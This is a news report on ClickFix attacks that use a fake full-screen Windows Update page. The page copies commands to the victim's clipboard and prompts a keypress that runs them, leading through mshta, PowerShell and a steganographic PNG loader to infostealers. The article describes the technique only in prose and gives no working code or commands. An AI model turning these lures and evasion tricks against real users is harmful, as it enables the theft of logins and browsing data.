Researchers have discovered a new series of ClickFix attacks in which cybercriminals use a convincing fake Windows Update screen to install malware on systems.
According to BleepingComputer, the attacks have been detected since early October. They appear to be particularly effective because victims believe they are dealing with a legitimate update to their operating system. The web page they see takes over the entire screen. It displays animations that closely resemble those of real Windows updates. While users believe they are performing necessary actions to complete the update process, they are actually executing commands prepared by the attackers.
Malicious instructions on the clipboard
The techniques used in these campaigns are a clear evolution of previous ClickFix methods. Whereas previously commands were simply shared for users to copy themselves, now a script on the web page ensures that malicious instructions are automatically placed on the clipboard.
The visitor is then instructed to press a key combination to complete the supposed update process. This causes the copied commands to be executed immediately in the Windows command prompt.
A special feature of the latest variants is the use of steganography to hide the actual malware in images. The attackers do not process the malicious code as an addition to an existing file, but place fragments of the payload in the pixel structure of PNG images.
According to researchers, specific color channels are manipulated in such a way that the final payload can only be reconstructed in memory when a loader written for this purpose becomes active.
Central role for PowerShell scripts
The attack usually starts with the launch of mshta, a legitimate Windows component that can execute JavaScript. Cybercriminals then initiate a chain of follow-up actions. PowerShell scripts and a .NET assembly play a central role in this chain. That assembly, internally referred to as Stego Loader, contains encrypted resources that ultimately contain the hidden PNG. Custom C# code decrypts the content and converts it into usable shellcode.
During the investigation into how this loader works, it was noticed that the threat actor uses a technique that calls thousands of empty functions before the actual code runs. This method makes analysis and detection more difficult, as it makes it harder for security software to gain insight into the actual behavior of the malware. Once this layer is removed, the final payload appears to consist of variants of information stealers that focus on collecting sensitive data, such as logins and browsing information.
Although parts of the infrastructure used in these attacks have now been disrupted, the misleading web pages remain online and the technology behind ClickFix poses a real threat.